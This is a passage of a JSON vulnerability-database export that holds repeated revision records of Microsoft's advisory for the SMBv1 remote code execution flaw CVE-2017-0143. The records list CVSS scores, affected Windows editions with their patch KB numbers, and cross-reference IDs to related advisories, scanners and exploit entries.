"kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T00:58:24", "differentElements": ["msAffectedSoftware"], "edition": 60}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "bdbcad436fc25396d6ee8890a5e6edb2", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T08:49:10", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8", "THN:BC214880895281474C1A8EF7B7D98C13"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:41987", "EDB-ID:47456", "EDB-ID:43970", "EDB-ID:41891"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-33895", "1337DAY-ID-33313", "1337DAY-ID-27752", "1337DAY-ID-27786", "1337DAY-ID-29702"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:142181", "PACKETSTORM:156196", "PACKETSTORM:146236", "PACKETSTORM:142548", "PACKETSTORM:154690"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM", "MS17-010.NASL"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810676", "OPENVAS:1361412562310810810"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-20-170-01", "ICSMA-18-058-02"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T08:49:10", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T08:49:10", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KB3177186", "KBMS16-110, 3187754", "KB3212646", "KB4013198", "KB4012215", "KB4012217", "KB4012213", "KB4013429", "KB3210721", "KB4012212", "KB4012606", "KB3213986", "KB3205409", "KB3210720", "KB4012216", "KB4012214", "KB4012598", "KB3205401"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows 7 for 32-bit Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows 10 Version 1607 for x64-based Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1607 for 32-bit Systems", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows 10 Version 1511 for x64-based Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 Version 1511 for 32-bit Systems", "kbSupersedence": "KB3210721", "kb": "KB4013198", "msplatform": ""}, {"name": "Windows 10 for x64-based Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}, {"name": "Windows 10 for 32-bit Systems", "kbSupersedence": "KB3210720", "kb": "KB4012606", "msplatform": ""}], "vendorCvss": {}}, "lastseen": "2021-09-19T08:49:10", "differentElements": ["msAffectedSoftware"], "edition": 61}, {"bulletin": {"id": "MS:CVE-2017-0143", "hash": "f7b4e50f4ef2188508dc09f5f5ce8194", "type": "mscve", "bulletinFamily": "microsoft", "title": "Windows SMB Remote Code Execution Vulnerability", "description": "A remote code execution vulnerability exists in the way that the Microsoft Server Message Block 1.0 (SMBv1) server handles certain requests. An attacker who successfully exploited the vulnerability could gain the ability to execute code on the target server.\n\nTo exploit the vulnerability, in most situations, an authenticated attacker could send a specially crafted packet to a targeted SMBv1 server.\n\nThe security update addresses the vulnerability by correcting how SMBv1 handles these specially crafted requests.\n", "published": "2017-03-14T07:00:00", "modified": "2017-03-14T07:00:00", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cvss2": {"cvssV2": {"accessComplexity": "MEDIUM", "accessVector": "NETWORK", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 9.3, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 8.6, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "HIGH", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "baseScore": 8.1, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0"}, "exploitabilityScore": 2.2, "impactScore": 5.9}, "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2017-0143", "reporter": "Microsoft", "references": [], "cvelist": ["CVE-2017-0143"], "immutableFields": [], "lastseen": "2021-09-19T10:51:44", "history": [], "viewCount": 9, "enchantments": {"dependencies": {"references": [{"type": "cve", "idList": ["CVE-2017-0143"]}, {"type": "attackerkb", "idList": ["AKB:D476227F-C4B1-49E3-9947-897077E5150D", "AKB:400EDB06-73BF-4A6D-A113-643077965C7B", "AKB:B43D414F-6140-4931-BED8-4AE15FFDFAE1"]}, {"type": "symantec", "idList": ["SMNTC-96703"]}, {"type": "talosblog", "idList": ["TALOSBLOG:E2BCC6AEFE1A7A25F49757116346A7A6"]}, {"type": "threatpost", "idList": ["THREATPOST:43C3E019D454987EF522E299C31E9D3F", "THREATPOST:F569DB7301109F1CDBCA30319EA8E2E7", "THREATPOST:7D1D823549046978FD52257C68DF7801", "THREATPOST:7E66A86C86BE8481D1B905B183CA42C3"]}, {"type": "canvas", "idList": ["MS17_010", "ETERNALBLUE"]}, {"type": "thn", "idList": ["THN:F12E2167FDA829ED32C7A16A83B048BF", "THN:BC214880895281474C1A8EF7B7D98C13", "THN:C50AC2400E56ED88DBA7FC6DAC8360A8"]}, {"type": "myhack58", "idList": ["MYHACK58:62201786371"]}, {"type": "saint", "idList": ["SAINT:BD676E3751A4D110EAA275BF92CA7E46", "SAINT:DAEC4BA69103823E03C8F3C832C5B41D"]}, {"type": "carbonblack", "idList": ["CARBONBLACK:6730D6EB8DF875C002A93DBC78C80B9D"]}, {"type": "nmap", "idList": ["NMAP:SMB-VULN-MS17-010.NSE"]}, {"type": "exploitdb", "idList": ["EDB-ID:47456", "EDB-ID:41987", "EDB-ID:41891", "EDB-ID:43970"]}, {"type": "zdt", "idList": ["1337DAY-ID-27613", "1337DAY-ID-27786", "1337DAY-ID-33895", "1337DAY-ID-29702", "1337DAY-ID-33313", "1337DAY-ID-27752"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:154690", "PACKETSTORM:156196", "PACKETSTORM:142181", "PACKETSTORM:146236", "PACKETSTORM:142548"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_ETERNALBLUE_WIN8", "MSF:EXPLOIT/WINDOWS/SMB/SMB_DOUBLEPULSAR_RCE", "MSF:EXPLOIT/WINDOWS/SMB/MS17_010_PSEXEC", "MSF:AUXILIARY/ADMIN/SMB/MS17_010_COMMAND", "MSF:EXPLOIT/WINDOWS/SMB/DOUBLEPULSAR_RCE", "MSF:AUXILIARY/SCANNER/SMB/SMB_MS17_010"]}, {"type": "huawei", "idList": ["HUAWEI-SA-20170513-01-WINDOWS"]}, {"type": "nessus", "idList": ["MS17-010.NASL", "700099.PRM", "SMB_NT_MS17-010.NASL", "700059.PRM"]}, {"type": "f5", "idList": ["F5:K57181937"]}, {"type": "rapid7community", "idList": ["RAPID7COMMUNITY:8B3AE9E0999C9317B6911ECE10B8A820", "RAPID7COMMUNITY:958C8DA808BCCA56E72237E0015ED607", "RAPID7COMMUNITY:9E4E3C72C90426CECD1801D8F0006388", "RAPID7COMMUNITY:B91CF4077282454499672A7AD6FBE744", "RAPID7COMMUNITY:3EEFED2F93F50D3C56A51C03A7A3513D", "RAPID7COMMUNITY:D6095B3BBE1704D4062E19C249D178EC", "RAPID7COMMUNITY:4570AAF658D82BF591A6D6AB473704B6", "RAPID7COMMUNITY:761964EB7C8E68AD2D9E6DC0095DF4C0"]}, {"type": "seebug", "idList": ["SSV:92952"]}, {"type": "openvas", "idList": ["OPENVAS:1361412562310810810", "OPENVAS:1361412562310810676"]}, {"type": "kaspersky", "idList": ["KLA10979", "KLA11902", "KLA10977"]}, {"type": "mskb", "idList": ["KB4013389"]}, {"type": "ics", "idList": ["ICSMA-18-058-02", "ICSMA-20-170-01"]}, {"type": "trendmicroblog", "idList": ["TRENDMICROBLOG:657A275464AD59827A9E6C1CD1726546"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:9BA334FCEF38374A0B09A0614B2D74D4"]}], "modified": "2021-09-19T10:51:44", "rev": 2}, "score": {"value": 7.8, "vector": "NONE", "modified": "2021-09-19T10:51:44", "rev": 2}}, "objectVersion": "1.6", "kbList": ["KBMS16-110, 3187754", "KB4012216", "KB4012606", "KB3212646", "KB3177186", "KB4012213", "KB3205401", "KB4012598", "KB4012212", "KB3205409", "KB3210720", "KB4012217", "KB4012214", "KB3213986", "KB4013429", "KB4012215", "KB4013198", "KB3210721"], "msrc": "", "mscve": "CVE-2017-0143", "msAffectedSoftware": [{"name": "Windows Server 2016 (Server Core installation)", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Server 2016", "kbSupersedence": "KB3213986", "kb": "KB4013429", "msplatform": ""}, {"name": "Windows Vista x64 Edition Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Vista Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows Server 2012 R2", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012 (Server Core installation)", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KB3205409", "kb": "KB4012217", "msplatform": ""}, {"name": "Windows Server 2012", "kbSupersedence": "KBMS16-110, 3187754", "kb": "KB4012214", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for x64-based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": "KB4012215", "msplatform": ""}, {"name": "Windows Server 2008 R2 for Itanium-Based Systems Service Pack 1", "kbSupersedence": "", "kb": "KB4012212", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2 (Server Core installation)", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for x64-based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for Itanium-Based Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows Server 2008 for 32-bit Systems Service Pack 2", "kbSupersedence": "KB3177186", "kb": "KB4012598", "msplatform": ""}, {"name": "Windows RT 8.1", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for x64-based systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "KB3205401", "kb": "KB4012216", "msplatform": ""}, {"name": "Windows 8.1 for 32-bit systems", "kbSupersedence": "", "kb": "KB4012213", "msplatform": ""}, {"name": "Windows 7 for x64-based Systems Service Pack 1", "kbSupersedence": "KB3212646", "kb": 